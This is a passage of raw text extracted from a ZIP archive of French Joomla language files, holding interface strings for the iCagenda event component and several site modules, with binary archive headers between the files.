COM_ICAGENDA_DATES_HELP_EXAMPLE4="ex: Un groupe de musique participe à un festival du jeudi 14:00 au dimanche 23:00. Le jeudi, le groupe joue à 16:30, le samedi à 18:00 et le dimanche à 13:15. Vous pouvez alors entrer la période de l'évènement (du jeudi 14:00 au dimanche 23:00) et ajouter des dates uniques avec l'heure, pour quand le groupe est sur ​​scène."
COM_ICAGENDA_DATES_HELP_LINE5="Évènement se déroulant sur une période, et avec d'autres dates qui ne sont pas sur cette période."
COM_ICAGENDA_DATES_HELP_EXAMPLE5="ex: un évènement qui se déroule du lundi au dimanche (dates sur une période) et une autre semaine, le mardi et le vendredi (dates simples)."
;
COM_ICAGENDA_LEGEND_PERIOD_DATES="Évènement sur une période"
COM_ICAGENDA_FORM_LBL_EVENTPERIOD_START="Date de Début"
COM_ICAGENDA_FORM_DESC_EVENTPERIOD_START="Date et heure du début de l'évènement"
COM_ICAGENDA_FORM_LBL_EVENTPERIOD_END="Date de Fin"
COM_ICAGENDA_FORM_DESC_EVENTPERIOD_END="Date et heure de fin de l'évènement"
COM_ICAGENDA_FORM_LBL_WEEK_DAYS="Jours de la semaine"
COM_ICAGENDA_FORM_WEEK_DAYS_INFO_TITLE="Sélection des jours de la semaine"
COM_ICAGENDA_FORM_WEEK_DAYS_INFO_DESC="Vous pouvez diviser la période en dates individuelles en sélectionnant les jours de la semaine.<br />Si laissé vide, la période ne sera pas divisée, et sera considérée comme une période complète (du ... au ... ).<br /><small>Vous pouvez utiliser la touche Ctrl-clic (Windows) ou Cmd-clic (Mac) pour sélectionner plusieurs éléments.</small>"
COM_ICAGENDA_FORM_ALL_WEEK_DAYS="Tous les jours de la semaine"
;
COM_ICAGENDA_LEGEND_SINGLE_DATES="Dates uniques"
COM_ICAGENDA_FORM_LBL_EVENT_DATES="Date"
COM_ICAGENDA_FORM_DESC_EVENT_DATES="Choisir la ou les date(s) de l'évènement"
COM_ICAGENDA_ADD_DATE="Ajouter"
COM_ICAGENDA_DELETE_DATE="Supprimer"
COM_ICAGENDA_TB_DATE="Date"
COM_ICAGENDA_TB_ACT="Actions"
COM_ICAGENDA_FORM_LBL_EVENT_NEXT="Prochaine Date"
COM_ICAGENDA_FORM_DESC_EVENT_NEXT="Prochaine date de l'évènement dans le calendrier"
;
COM_ICAGENDA_DISPLAY_TIME_LABEL="Affichage de l'heure"
COM_ICAGENDA_DISPLAY_TIME_DESC="Afficher/Masquer l'heure de l'évènement"
;
; Panel Information
COM_ICAGENDA_LEGEND_INFORMATION="Information"
;
; Panel Venue
COM_ICAGENDA_LEGEND_VENUE="Lieu de l'évènement"
COM_ICAGENDA_FORM_LBL_EVENT_VENUE="Lieu"
COM_ICAGENDA_FORM_DESC_EVENT_VENUE="L'endroit où l'évènement se déroule (MoMA, Tour Eiffel, Stade de France, Londres Concert Hall, chez-vous, école, université, bâtiment...)"
;
COM_ICAGENDA_LEGEND_PLACE="Lieu de l'évènement"
COM_ICAGENDA_FORM_LBL_EVENT_PLACE="Lieu"
COM_ICAGENDA_FORM_DESC_EVENT_PLACE="Renseigner le lieu (Salle de concert, Festival, nom exact du lieu, etc.)"
COM_ICAGENDA_FORM_LBL_EVENT_CITY="Ville"
COM_ICAGENDA_FORM_DESC_EVENT_CITY="Ville du lieu de l'évènement"
COM_ICAGENDA_FORM_LBL_EVENT_COUNTRY="Pays"
COM_ICAGENDA_FORM_DESC_EVENT_COUNTRY="Le pays du lieu de l'évènement"
;
COM_ICAGENDA_LEGEND_CONTACT="Informations de Contact"
COM_ICAGENDA_FORM_LBL_EVENT_EMAIL="Email"
COM_ICAGENDA_FORM_DESC_EVENT_EMAIL="Renseigner l'Email de contact"
COM_ICAGENDA_FORM_LBL_EVENT_PHONE="Téléphone"
COM_ICAGENDA_FORM_DESC_EVENT_PHONE="Renseigner les coordonnées téléphoniques de contact"
COM_ICAGENDA_FORM_LBL_EVENT_WEBSITE="Site Internet"
COM_ICAGENDA_FORM_DESC_EVENT_WEBSITE="Site internet de l'évènement"
;
; Custom Fields
COM_ICAGENDA_LEGEND_OTHER_INFORMATION="Autres informations"
;
; Panel Description
COM_ICAGENDA_LEGEND_DESC="Description"
COM_ICAGENDA_SUBMIT_AN_EVENT_SHORT_DESCRIPTION_LBL="Description courte"
COM_ICAGENDA_SUBMIT_AN_EVENT_SHORT_DESCRIPTION_DESC="Veuillez renseigner une description courte pour cet évènement."
COM_ICAGENDA_MAXIMUM_N_CHARACTERS="Maximum de %s caractères"
COM_ICAGENDA_N_REMAINING="(%s restants)"
COM_ICAGENDA_FORM_LBL_EVENT_DESC="Texte de description"
COM_ICAGENDA_SUBMIT_AN_EVENT_DESCRIPTION_DESC="Veuillez renseigner une description pour cet évènement."
COM_ICAGENDA_FORM_EVENT_METADESC_LBL="Méta-description"
COM_ICAGENDA_SUBMIT_AN_EVENT_METADESC_DESC="La méta-description permet d'indexer une description courte de l'évènement afin d'améliorer son référencement. Lorsque l'évènement est indexé par un moteur dans les résultats d'une recherche, le texte de cette méta-description est affiché sous le titre."
COM_ICAGENDA_ALERT_TEXT_EXCEEDS_CHARACTER_LIMIT="Le texte renseigné dépasse le nombre de caractères autorisé. \n\nVeuillez éditer le champ de sorte que le texte ne soit pas tronqué, et qu'il s'adapte à la limitation du nombre de caractères."
;
; Panel Options
COM_ICAGENDA_REGISTRATION_OPTIONS="Options Inscriptions"
COM_ICAGENDA_REGISTRATION_LABEL="Inscriptions"
COM_ICAGENDA_REGISTRATION_DESC="Activer l'inscription à cet évènement"
COM_ICAGENDA_TYPE_REG_LABEL="Mode d'inscription"
COM_ICAGENDA_TYPE_REG_DESC="Sélectionner le mode d'inscription: par date (affiche une liste de toutes les dates) ou pour toutes les dates de l'évènement."
COM_ICAGENDA_REG_BY_INDIVIDUAL_DATE="par date"
COM_ICAGENDA_REG_FOR_ALL_DATES="pour toutes les dates"
COM_ICAGENDA_MAX_REGISTRATIONS_LABEL="Nb de places"
COM_ICAGENDA_MAX_REGISTRATIONS_DESC="Nombre de places disponibles par jour.<br />Si l'option <strong>Type d'inscription</ strong> est réglée sur 'Pour toutes les dates de l'évènement', le nombre de places sera appliqué à l'évènement dans sa globalité, et non par date."
COM_ICAGENDA_MAX_PER_REGISTRATION_LABEL="Max. par inscription"
COM_ICAGENDA_MAX_PER_REGISTRATION_DESC="Nombre maximum de places disponibles lors d'une inscription"
;
; Google Maps
COM_ICAGENDA_LEGEND_GOOGLE_MAPS="Google Maps"
COM_ICAGENDA_GOOGLE_MAPS_SUBTITLE_LBL="Adresse picker, avec affichage instantané sur la carte."
COM_ICAGENDA_GOOGLE_MAPS_NOTE1="La carte affiche l'adresse sélectionnée, même pendant que vous naviguez dans les suggestions automatiques."
COM_ICAGENDA_GOOGLE_MAPS_NOTE2="Vous pouvez même ajuster la position du marqueur sur la carte."
COM_ICAGENDA_GOOGLE_MAPS_ADDRESS_LBL="Adresse"
COM_ICAGENDA_GOOGLE_MAPS_LATITUDE_LBL="Latitude"
COM_ICAGENDA_GOOGLE_MAPS_LONGITUDE_LBL="Longitude"
COM_ICAGENDA_GOOGLE_MAPS_REVERSE="Récupérer l'adresse après déplacement du marqueur ?"
COM_ICAGENDA_GOOGLE_MAPS_LEGEND="Vous pouvez glisser et déposer le marqueur à l'emplacement correct"
COM_ICAGENDA_FORM_LBL_EVENT_LOCATION="Entrer une adresse pour visualiser la carte"
COM_ICAGENDA_FORM_DESC_EVENT_LOCATION="Entrer une adresse pour visualiser la carte: adresse complète, rue, ville, pays, ..."
COM_ICAGENDA_FORM_LBL_EVENT_MAP="<i>Situation Géographique</i>"
COM_ICAGENDA_FORM_DESC_EVENT_MAP="Situation sur Google Maps du lieu où se déroule l'évènement (déplacer le curseur sur la carte pour ajuster automatiquement)"
COM_ICAGENDA_FORM_LBL_EVENT_GPS="<i>Coordonnées GPS</i>"
COM_ICAGENDA_MAPS_SERVICE_NOT_AVAILABLE="Le service de cartes n'est pas disponible."
COM_ICAGENDA_MAPS_FILL_IN_ADDRESS_ALERT="Veuillez d'abord remplir le champ d'adresse."

;
; Warning Messages Box
COM_ICAGENDA_FORM_ALERT_UNPUBLISHED="Votre évènement ne sera pas publié : aucune date valide pour cet évènement"
COM_ICAGENDA_FORM_ERROR_NO_STARTDATE="Erreur : Vous avez renseigné une date de fin, mais aucune date de début pour votre évènement"
COM_ICAGENDA_FORM_ERROR_NO_ENDDATE="Erreur : Vous avez renseigné une date de début, mais aucune date de fin pour votre évènement"
COM_ICAGENDA_FORM_NO_DATES_ALERT="Veuillez sélectionner les dates de l'évènement."
IC_AUTH_REQUIRED="Authentification requise"
COM_ICAGENDA_LOGIN_TO_ACCESS_REGISTRATION_FORM="Veuillez vous connecter pour accéder au formulaire d'inscription."
COM_ICAGENDA_LOGIN_TO_ACCESS_REGISTRATION_CANCELLATION="Veuillez vous connecter pour accéder à l'annulation de l'inscription."
COM_ICAGENDA_FORM_ERROR_INVALID_FIELD="Champ non valide: %s"
COM_ICAGENDA_FORM_WARNING="Attention: %s"
COM_ICAGENDA_FORM_ERROR="Erreur: %s"
COM_ICAGENDA_FORM_ERROR_NO_DATES="Veuillez sélectionner les dates de l'évènement."
COM_ICAGENDA_FORM_ERROR_INCORRECT_CAPTCHA_SOL="La réponse CAPTCHA est incorrecte."
;
; Event Submission
COM_ICAGENDA_EVENT_SUBMISSION="Proposition d'un évènement"
COM_ICAGENDA_EVENT_SUBMISSION_SUBMIT_NEW_EVENT="Nouvel Évènement"
COM_ICAGENDA_EVENT_SUBMISSION_ACCESS="Vous devez être connecté pour pouvoir proposer un évènement!"
COM_ICAGENDA_EVENT_SUBMISSION_NO_RIGHTS="Vous n'êtes pas autorisé à proposer un évènement."
COM_ICAGENDA_EVENT_FORM_SUBMIT="Proposez votre évènement"
COM_ICAGENDA_EVENT_SUBMISSION_CONFIRMATION="Votre évènement a été enregistré!"
COM_ICAGENDA_EVENT_SUBMISSION_THANK_YOU="Merci d'avoir proposé votre évènement sur le site %s!"
COM_ICAGENDA_EVENT_SUBMISSION_ANY_QUESTIONS="À tout moment, n'hésitez pas à proposer de nouveaux évènements et à poser toutes les questions que vous pourriez avoir à %s."
COM_ICAGENDA_EVENT_SUBMISSION_VALIDATION_BY_EDITOR="Vous allez recevoir un message indiquant que votre évènement a été soumis pour examen par un éditeur."
COM_ICAGENDA_EVENT_SUBMISSION_VALIDATION_BY_EDITOR_APPROVED="Votre évènement n'apparaîtra pas sur le calendrier jusqu'à ce qu'il ait été approuvé."
COM_ICAGENDA_EVENT_SUBMISSION_VALIDATION_BY_EDITOR_TIME="La plupart des évènements soumis sont traités dans les %s heures."
COM_ICAGENDA_EVENT_SUBMISSION_VALIDATION_STAFF="L'équipe va examiner votre demande et vous contactera bientôt."
COM_ICAGENDA_EVENT_SUBMISSION_EDITOR_REVIEW="Un éditeur va examiner votre demande avant de la valider."
COM_ICAGENDA_EVENT_SUBMISSION_CONFIRMATION_EMAIL="Vous recevrez un email de confirmation lorsque votre évènement sera approuvé, avec un lien direct pour le visualiser en ligne."
COM_ICAGENDA_EVENT_SUBMISSION_VALIDATION_CONTACT="Si vous ne recevez pas de nos nouvelles, merci de contacter %s à l'adresse email %s."
COM_ICAGENDA_USER_EMAIL_HELLO="Bonjour %s"
COM_ICAGENDA_USER_EMAIL_BEST_REGARDS="Cordialement,<br /> [SITENAME]"
COM_ICAGENDA_USER_EMAIL_EVENT_REFERENCE_NUMBER="Numéro de référence de votre évènement : %s"
COM_ICAGENDA_USER_EMAIL_EVENT_TITLE_AND_REF_NO="Votre évènement '%s' a été enregistré sous le numéro de référence '%s'."
;
; Approved Notification Email
COM_ICAGENDA_APPROVED_USEREMAIL_SUBJECT="Votre évènement %s vient d'être validé"
COM_ICAGENDA_APPROVED_USEREMAIL_BODY_INTRO="Vous recevez cet email car vous avez proposé un évènement sur le site %s. Celui-ci a été approuvé."
COM_ICAGENDA_APPROVED_USEREMAIL_EVENT_LINK="Visualiser votre évènement : %s"
COM_ICAGENDA_APPROVED_USEREMAIL_EVENT_LINK_INFO="Si l'URL n'est pas cliquable, il suffit de copier/coller ce lien dans votre navigateur."
;
; Event Submission Notification Emails
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_SUBJECT="%s a proposé un nouvel évènement sur le site %s"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_HELLO="Bonjour %s"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_NEW_EVENT="Un nouvel évènement a été proposé!"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_PREVIEW="Prévisualisation"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_APPROVE_INFO="Pour valider cet évènement sur %s, veuillez cliquer sur le lien suivant. Si l'URL n'est pas cliquable, il suffit de copier/coller ce lien dans votre navigateur."
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_APPROVE_LINK="Lien de validation"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_SITE_MENUID="Cet évènement a été proposé via le lien de menu ([ID] Titre) : [%s] %s"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_USER_INFO="Créer par : %s, %s"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_FOOTER="Vous avez reçu cet email d'iCagenda, installé sur le site %s, car vous appartenez à un groupe d'utilisateurs autorisé à valider les évènements proposés en frontal du site. En cliquant sur les liens ci-dessus, vous serez automatiquement connecté. Si vous ne voulez pas apparaître comme utilisateur connecté, ne cliquez pas sur ces liens."
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_FOOTER_NO_AUTOLOGIN="Vous avez reçu cet email d'iCagenda, installé sur le site %s, car vous appartenez à un groupe d'utilisateurs autorisé à valider les évènements proposés en frontal du site."
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_APPROVED_REVIEW="Pour revoir votre évènement, cliquez sur le lien suivant:"


; Traductions dates.js
SA="Sa"
SU="Di"
MO="Lu"
TU="Ma"
WE="Me"
TH="Je"
FR="Ve"

; Traductions textes timepiker.js
COM_ICAGENDA_TP_CURRENT="Maintenant"
COM_ICAGENDA_TP_CLOSE="Valider"
COM_ICAGENDA_TP_TITLE="Choisir l'horaire"
COM_ICAGENDA_TP_TIME="Horaire"
COM_ICAGENDA_TP_HOUR="Heure"
COM_ICAGENDA_TP_MINUTE="Minute"

;
; DEPRECATED STRINGS
;

; DEPRECATED 3.6.0 - Removed 4.0.0
COM_ICAGENDA_REGISTRATION_COMPLETE="Votre inscription à l'évènement <i>%s</i> est terminée."

; DEPRECATED 3.7.0 - Removed 4.0.0
COM_ICAGENDA_TERMS_AND_CONDITIONS_AGREE="J'ai lu et accepte les Conditions Générales"

PK!ߗ� fr-FR/fr-FR.mod_tags_similar.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_TAGS_SIMILAR="Tags similaires"
MOD_TAGS_SIMILAR_FIELD_ALL="Tous"
MOD_TAGS_SIMILAR_FIELD_HALF="Moitié"
MOD_TAGS_SIMILAR_FIELD_MATCHTYPE_DESC="Quantité de tags similaires déterminant les articles à afficher.<br />'Tous' exige que tous les tags soient similaires.<br />'Au moins un' exige qu'au moins un tag soit similaire.<br />'Moitié' exige que la moitié des tags soient similaires."
MOD_TAGS_SIMILAR_FIELD_MATCHTYPE_LABEL="Niveau de similitude"
MOD_TAGS_SIMILAR_FIELD_ONE="Au moins un"
MOD_TAGS_SIMILAR_LAYOUT_DEFAULT="Défaut"
MOD_TAGS_SIMILAR_MAX_DESC="Nombre maximal de liens à afficher dans le module."
MOD_TAGS_SIMILAR_MAX_LABEL="Nombre maximal de liens"
MOD_TAGS_SIMILAR_NO_MATCHING_TAGS="Aucun tag similaire"
MOD_TAGS_SIMILAR_XML_DESCRIPTION="Le module 'Tags similaires' affiche des liens vers des articles ayant des tags similaires. La quantité de tags devant être similaires peut être indiquée."
MOD_TAGS_SIMILAR_FIELD_ORDERING_LABEL="Ordre des résultats"
MOD_TAGS_SIMILAR_FIELD_ORDERING_DESC="Sélectionner l'ordre dans lequel vous désirez voir présenter les résultats."
MOD_TAGS_SIMILAR_FIELD_ORDERING_COUNT="Nombre de tags correspondants"
MOD_TAGS_SIMILAR_FIELD_ORDERING_RANDOM="Aléatoire"
MOD_TAGS_SIMILAR_FIELD_ORDERING_COUNT_AND_RANDOM="Nombre de tags correspondants & aléatoire"
PK!D$[v��!fr-FR/fr-FR.tpl_protostar.sys.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


TPL_PROTOSTAR_POSITION_BANNER="Bannière"
TPL_PROTOSTAR_POSITION_DEBUG="Débogage"
TPL_PROTOSTAR_POSITION_POSITION-0="Recherche"
TPL_PROTOSTAR_POSITION_POSITION-10="Inutilisé"
TPL_PROTOSTAR_POSITION_POSITION-11="Inutilisé"
TPL_PROTOSTAR_POSITION_POSITION-12="Inutilisé"
TPL_PROTOSTAR_POSITION_POSITION-13="Inutilisé"
TPL_PROTOSTAR_POSITION_POSITION-14="Inutilisé"
TPL_PROTOSTAR_POSITION_POSITION-15="Inutilisé"
TPL_PROTOSTAR_POSITION_POSITION-1="Navigation"
TPL_PROTOSTAR_POSITION_POSITION-2="Fil de navigation"
TPL_PROTOSTAR_POSITION_POSITION-3="Haut centré"
TPL_PROTOSTAR_POSITION_POSITION-4="Inutilisé"
TPL_PROTOSTAR_POSITION_POSITION-5="Inutilisé"
TPL_PROTOSTAR_POSITION_POSITION-6="Inutilisé"
TPL_PROTOSTAR_POSITION_POSITION-7="Droite"
TPL_PROTOSTAR_POSITION_POSITION-8="Gauche"
TPL_PROTOSTAR_POSITION_POSITION-9="Inutilisé"
TPL_PROTOSTAR_POSITION_FOOTER="Pied de page"
TPL_PROTOSTAR_XML_DESCRIPTION="Poursuivant le thème sur l'espace (Solarflare de Joomla 1.0 et Milkyway de Joomla 1.5 ), Protostar est le template de site Joomla 3, basé sur Bootstrap et le lancement de l'interface utilisateur Joomla bibliothèque (JUI)."
PK!q��$fr-FR/fr-FR.mod_tags_similar.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_TAGS_SIMILAR="Tags similaires"
MOD_TAGS_SIMILAR_LAYOUT_DEFAULT="Défaut"
MOD_TAGS_SIMILAR_XML_DESCRIPTION="Le module 'Tags similaires' affiche des liens vers des articles ayant des tags similaires. La quantité de tags devant être similaires peut être indiquée."

PK!.�.��fr-FR/fr-FR.com_ajax.ininu&1i�; @date        2014-09-16
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8



COM_AJAX="Interface Ajax"
COM_AJAX_XML_DESCRIPTION="Interface Ajax extensible pour Joomla!"
COM_AJAX_SPECIFY_FORMAT="Merci de spécifier un format de réponse valide autre que celui du HTML, par exemple json, raw, debug, etc."
COM_AJAX_METHOD_NOT_EXISTS="La méthode %s n'existe pas"
COM_AJAX_FILE_NOT_EXISTS="Le fichier %s n'existe pas"
COM_AJAX_MODULE_NOT_ACCESSIBLE="Le module %s n'est pas publié, vous n'y avez pas accès ou il n'est pas assigné à l'élément de menu courant."
COM_AJAX_TEMPLATE_NOT_ACCESSIBLE="Le template %s n'est pas assigné au lien de menu courant."
PK!e�,?^^'fr-FR/fr-FR.mod_articles_categories.ininu&1i�; @date        2015-01-31
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_CATEGORIES="Articles - Catégories"
MOD_ARTICLES_CATEGORIES_FIELD_COUNT_DESC="Saisissez par une valeur numérique le nombre de catégories à afficher en premier niveau.<br />La valeur '0' les affiche toutes."
MOD_ARTICLES_CATEGORIES_FIELD_COUNT_LABEL="Nombre de catégories"
MOD_ARTICLES_CATEGORIES_FIELD_MAXLEVEL_DESC="Saisissez par une valeur numérique le nombre de niveaux maximums de sous-catégorie à afficher.<br />La valeur '0' les affiche toutes."
MOD_ARTICLES_CATEGORIES_FIELD_MAXLEVEL_LABEL="Niveaux de catégories"
MOD_ARTICLES_CATEGORIES_FIELD_PARENT_DESC="Sélectionnez la catégorie parente contenant les catégories à afficher."
MOD_ARTICLES_CATEGORIES_FIELD_PARENT_LABEL="Catégorie parente"
MOD_ARTICLES_CATEGORIES_FIELD_SHOW_CHILDREN_DESC="Afficher/Masquer les sous-catégories."
MOD_ARTICLES_CATEGORIES_FIELD_SHOW_CHILDREN_LABEL="Sous-catégories"
MOD_ARTICLES_CATEGORIES_FIELD_NUMITEMS_DESC="Afficher/Masquer le nombre d'articles"
MOD_ARTICLES_CATEGORIES_FIELD_NUMITEMS_LABEL="Afficher le nombre d'articles"
MOD_ARTICLES_CATEGORIES_FIELD_SHOW_DESCRIPTION_DESC="Afficher/Masquer la description des catégories"
MOD_ARTICLES_CATEGORIES_FIELD_SHOW_DESCRIPTION_LABEL="Description"
MOD_ARTICLES_CATEGORIES_TITLE_HEADING_DESC="Sélectionnez le niveau de classe de Header à appliquer"
MOD_ARTICLES_CATEGORIES_TITLE_HEADING_LABEL="Balise de titre"
MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION="Le module 'mod_articles_categories' affiche une liste des catégories d'une catégorie parente."
PK!j��hhfr-FR/fr-FR.mod_wrapper.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_WRAPPER="Fenêtre intégrée"
MOD_WRAPPER_NO_IFRAMES="Pas d'iframe"
MOD_WRAPPER_XML_DESCRIPTION="Le module 'mod_wrapper' affiche une fenêtre intégrée (iframe) contenant la page d'une URL spécifiée."
MOD_WRAPPER_LAYOUT_DEFAULT="Défaut"

PK!L���fr-FR/fr-FR.mod_finder.sys.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_FINDER="Recherche avancée"
MOD_FINDER_XML_DESCRIPTION="Module pour le système de recherche avancée."
MOD_FINDER_LAYOUT_DEFAULT="Défaut"
PK!�(�V�� fr-FR/fr-FR.mod_tags_popular.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_TAGS_POPULAR="Tags populaires"
MOD_TAGS_POPULAR_FIELD_ALL_TIME="Depuis le début"
MOD_TAGS_POPULAR_FIELD_DISPLAY_COUNT_DESC="Afficher ou non le nombre d'éléments taggés à côté de chaque tag."
MOD_TAGS_POPULAR_FIELD_DISPLAY_COUNT_LABEL="Afficher le nombre d'éléments"
MOD_TAGS_POPULAR_FIELD_LAST_DAY="Dernier jours"
MOD_TAGS_POPULAR_FIELD_LAST_HOUR="Dernière heure"
MOD_TAGS_POPULAR_FIELD_LAST_MONTH="Dernier mois"
MOD_TAGS_POPULAR_FIELD_LAST_WEEK="Dernière semaine"
MOD_TAGS_POPULAR_FIELD_LAST_YEAR="Dernière année"
MOD_TAGS_POPULAR_FIELD_MAX_DESC="Saisir le nombre maximum de tags à afficher dans le module. Saisir &quot;0&quot; pour afficher tous les tags."
MOD_TAGS_POPULAR_FIELD_MAX_LABEL="Nombre maximum de tags"
MOD_TAGS_POPULAR_FIELD_MAXSIZE_DESC="La taille maximum de la police utilisée pour les tags, proportionnellement à la taille de la police par défaut du site (c.a.d. &quot;2&quot; veut dire 200% de la taille par défaut)."
MOD_TAGS_POPULAR_FIELD_MAXSIZE_LABEL="Taille de police maximum"
MOD_TAGS_POPULAR_FIELD_MINSIZE_DESC="La taille minimum de la police utilisée pour les tags, proportionnellement à la taille de la police par défaut du site (c.a.d. &quot;2&quot; veut dire 200% de la taille par défaut)."
MOD_TAGS_POPULAR_FIELD_MINSIZE_LABEL="Taille de police minimum"
MOD_TAGS_POPULAR_FIELD_NO_RESULTS_DESC="Affichera un message si aucun tag n'est trouvé au lieu de cacher le module."
MOD_TAGS_POPULAR_FIELD_NO_RESULTS_LABEL="Affiche le texte &quot;Aucun résultat&quot;"
MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_COUNT="Nombre d'éléments"
MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_DESC="Ordre d'affichage des tags."
MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_LABEL="Ordre"
MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_RANDOM="Aléatoire"
MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_TITLE="Titre"
MOD_TAGS_POPULAR_FIELD_TIMEFRAME_DESC="Définit la période de calcul de la popularité des tags."
MOD_TAGS_POPULAR_FIELD_TIMEFRAME_LABEL="Période"
MOD_TAGS_POPULAR_FIELDSET_CLOUD_LABEL="Affichage en nuage"
MOD_TAGS_POPULAR_MAX_DESC="Nombre maximal de tags à afficher dans le module."
MOD_TAGS_POPULAR_MAX_LABEL="Nombre maximal de tags"
MOD_TAGS_POPULAR_NO_ITEMS_FOUND="Aucun résultat."
MOD_TAGS_POPULAR_PARENT_TAG_DESC="Limiter les tags affichés aux enfants de ce tag parent."
MOD_TAGS_POPULAR_PARENT_TAG_LABEL="Tag parent"
MOD_TAGS_POPULAR_XML_DESCRIPTION="Le module 'Tags populaires' affiche les tags les plus couramment utilisés sous forme de liste ou de nuage. Les tags peuvent être ordonnés par titre ou par nombre d'éléments tagués et limités à une période de temps spécifique."
PK!�g+6xxfr-FR/fr-FR.mod_stats.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_STATS="Statistiques"
MOD_STATS_XML_DESCRIPTION="Le module 'mod_stats' affiche des information sur votre serveur ainsi que des statistiques sur les utilisateurs du site et le nombre d'articles dans votre base de données."
MOD_STATS_LAYOUT_DEFAULT="Défaut"

PK!���!!fr-FR/fr-FR.mod_custom.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_BACKGROUNDIMAGE_FIELD_LOGO_DESC="Si vous sélectionnez une image ici, elle sera automatiquement insérée comme style inline pour l'élément div entourant ce contenu"
MOD_CUSTOM="Contenu personnalisé"
MOD_CUSTOM_FIELD_PREPARE_CONTENT_DESC="Activer/Désactiver la prise en charge des plug-ins de contenu."
MOD_CUSTOM_FIELD_PREPARE_CONTENT_LABEL="Plug-ins de contenu"
MOD_CUSTOM_FIELD_BACKGROUNDIMAGE_LABEL="Sélectionner une image de fond"
MOD_CUSTOM_XML_DESCRIPTION="Le module 'mod_custom' permet de créer vos propres modules personnalisés en y intégrant les contenus souhaités à l'aide de l'éditeur, code inclus si les droits de l'éditeur et de Joomla vous le permettent."
PK!
�RD��fr-FR/fr-FR.mod_languages.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_LANGUAGES="Changement de langue"
MOD_LANGUAGES_FIELD_ACTIVE_DESC="Afficher/Masquer la langue active. Si affichée, la classe CSS 'lang-active' sera ajoutée au module."
MOD_LANGUAGES_FIELD_ACTIVE_LABEL="Langue active"
MOD_LANGUAGES_FIELD_CACHING_DESC="Utiliser les paramètres globaux de mise en cache ou non du contenu de ce module. <br />Sélectionner 'Pas de cache' quand les Associations sont utilisées!"
MOD_LANGUAGES_FIELD_DROPDOWN_DESC="Si sélectionné, les noms natifs des langues de contenu seront présentés dans une liste déroulante."
MOD_LANGUAGES_FIELD_DROPDOWN_LABEL="Utiliser liste déroulante"
